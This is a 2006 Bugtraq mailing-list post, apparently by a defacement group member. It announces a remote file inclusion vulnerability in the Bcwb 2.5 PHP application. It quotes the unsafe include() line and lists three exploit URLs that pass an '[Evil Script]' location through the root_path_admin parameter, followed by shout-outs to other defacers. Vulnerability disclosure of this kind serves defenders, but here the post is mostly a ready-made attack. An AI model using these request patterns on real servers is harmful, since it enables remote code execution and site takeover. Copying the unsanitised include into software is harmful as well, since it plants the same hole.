[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Multiple Remote File Include
- To: bugtraq@xxxxxxxxxxxxxxxxx
- Subject: Multiple Remote File Include
- From: firewall1954@xxxxxxxxxxx
- Date: 30 Oct 2006 17:55:25 -0000
####################### Firewall #########################
Bcwb 2.5 - Multiple File Include by Firewall
Latin American Defacers
BuG FounD by Firewall
# Application Affect:
Bcwb 2.5
# Sorce Code:
http://prdownloads.sourceforge.net/bcwb/bcwb_v25.zip?download
# Code:
if(! include($root_path_admin.'lang/'.$default_language.'.inc.php') )
die("Can't include ".$root_path.'lang/'.$default_language.'.inc.php');
# ExPloit :
http://www.site.com/Bcwb_PATH/include/startup.inc.php?root_path_admin=[Evil
Script]
http://www.site.com/Bcwb_PATH/dcontent/default.css.php?root_path_admin=[Evil
Script]
http://www.site.com/Bcwb_PATH/system/default.css.php?root_path_admin=[Evil
Script]
# GrEatZ :LAD,C-group,Her0,slackwaren,slappter,Cvir.System,Hanowars,ANtrAX
,napster,saok,Zlevyn,FaLENcE,Azrael,CyberAlexis,krhonoz,RaDaM4nTySS.
####################### Firewall #########################